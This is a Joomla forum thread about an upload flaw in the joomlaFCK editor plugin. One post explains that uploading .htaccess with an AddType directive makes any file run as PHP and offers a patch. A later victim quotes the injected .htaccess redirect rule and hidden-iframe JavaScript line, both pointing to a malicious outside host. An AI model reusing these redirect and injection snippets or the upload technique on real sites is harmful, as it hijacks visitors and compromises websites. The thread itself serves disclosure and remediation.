Backdoor in joomlaFCK

For all Non-Joomla! security issues. ie 3pd Components etc.

Moderator: General Support Moderators

Locked
pzotov
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Mon Mar 20, 2006 4:52 pm
Location: Russia
Contact:

Backdoor in joomlaFCK

Post by pzotov » Mon Aug 28, 2006 2:26 pm

Any user can upload files to your site.

joomlaFCK <= 1.1.5
http://www.site.com/mambots/editors/fck ... nector.php

joomlaFCK 1.2.0
http://www.site.com/mambots/editors/fck ... nector.php

joomlaFCK disallows to upload .php-files, but it allows to upload .htaccess (with Type=File or Type=files). So AddType directive in .htaccess allows to run any file as php.

My solution:
File:
mambots/editors/fckeditor/editor/filemanager/browser/default/connectors/php/config.php

After line 27 add:

Code: Select all

// Added by Pavel V. Zotov 20060720
define( '_VALID_MOS', 1 );

$allowed_backend_groups = array(23,24,25);

require_once( $mosConfig_absolute_path."/globals.php" );
require_once( $mosConfig_absolute_path."/includes/joomla.php" );
session_name( md5( $mosConfig_live_site ) );
session_start();
$mainframe = new mosMainFrame( $database, '', $mosConfig_absolute_path, 1 );
$my = $mainframe->initSessionAdmin( null, null );
if( !in_array( $my->gid, $allowed_backend_groups ) ) die( 'Restricted access' );
// end of addition by Pavel V. Zotov
So, only SuperAdministrator, Administrator or Manager (logged in backend) can use filemanager in joomlaFCK

Also you should to dissalow .htaccess
Last edited by pzotov on Mon Aug 28, 2006 2:33 pm, edited 1 time in total.

User avatar
smart
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 109
Joined: Thu Aug 18, 2005 1:33 pm
Location: Sebastopol
Contact:

Re: Backdoor in joomlaFCK

Post by smart » Mon Sep 04, 2006 8:31 am

pzotov wrote: joomlaFCK disallows to upload .php-files, but it allows to upload .htaccess (with Type=File or Type=files). So AddType directive in .htaccess allows to run any file as php.
I'm wrote mail to Frederico Caldeira Knabben (FCKEditor author) and got answer about this problem:

«Thanks for the advice. I'll add the htaccess to the list of denied extensions. Actually the real solution would be to set the list of allowed extensions instead, but I would have a lot of complains regarding missing extensions there.»
Joomlaportal.ru News, articles and tutorials
Joomlaforum.ru Russian Joomla Support Forum
Member of the Russian Joomla Translation Team

dparanhos
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Thu Feb 07, 2013 4:23 pm

Re: Backdoor in joomlaFCK

Post by dparanhos » Thu Feb 07, 2013 4:51 pm

I can confirm this backdoor as my website was hacked by it. It affects .htaccess and javascript files.
My website was based in Joomla 1.7.1 at jan/2013.

I will briefly describe what happened.

Few weeks after installing this JoomlaCK or JoomlaFCK plugin, when I tried to access my website it was instantly forwarded to a malicious website.

I found that my root .htacess file had this line added automatically without my permission:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]
RewriteRule ^.*$ http://gabriellerosephotography .com/emad.html?h=933119 [L,R]
</IfModule>

Also, many folders within administrator/modules had brand new .htaccess file created all containing the code above.

Another thing, all my custom javascritp files had the line added:
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography. com/emad.html?j=933119></iframe>');

I started checking the cronology of creation of these files, and I found out that the first .htacess created was inside the JCKeditor plugin folder, so I suspected that this was the starting point. Also, the only plugin folder affected was this plugin. Most of folders affected were modules.

Searching the web about the JoomlaCK plugin editor backdoor, I found the topic above, that confirms to me exactly how my website was hacked.

Unfortunatelly I had to disable the plugin, even though it seems very usefull. I dont know if this bug / backdoor is already fixed, I just would like to share here to prevent other websites being hacked as long as I suspect this was the cause of attack.
Last edited by mandville on Thu Feb 07, 2013 9:28 pm, edited 1 time in total.
Reason: broke links

User avatar
brian
Joomla! Master
Joomla! Master
Posts: 11765
Joined: Fri Aug 12, 2005 7:19 am
Location: Leeds, UK
Contact:

Re: Backdoor in joomlaFCK

Post by brian » Thu Feb 07, 2013 5:11 pm

Joomla 1.7.1 is out dated and insecure - just because you see the evidence of the hack in a cpecific extensions folder doesnt mean that it is the cause. If I was a naughty boy and had hacked your site and uploaded a backdoor there is no way I wold be as stupid as to leave the backdoor in a place that would let you identify the area of vulnerability. Instead i would hide it somewhere completely different and probably at the end of the deepest directory i could find on the site
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/

dparanhos
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Thu Feb 07, 2013 4:23 pm

Re: Backdoor in joomlaFCK

Post by dparanhos » Wed Feb 20, 2013 12:13 pm

brian wrote:Joomla 1.7.1 is out dated and insecure - just because you see the evidence of the hack in a cpecific extensions folder doesnt mean that it is the cause. If I was a naughty boy and had hacked your site and uploaded a backdoor there is no way I wold be as stupid as to leave the backdoor in a place that would let you identify the area of vulnerability. Instead i would hide it somewhere completely different and probably at the end of the deepest directory i could find on the site

Mr BRIAN,

You are right, probably the cause of attack is not the extension itself, my conclusion was based only in the timeframe of contamination. Later I found many other up folders with contaminated XSS files as you suggested, including PHPs, javascripts and HTMLs.

I updated joomla to a fresh 2.5.9, after making a research about joomla 1.7.1 core XSS vulnerabilities.


Locked

Return to “3rd Party/Non Joomla! Security Issues”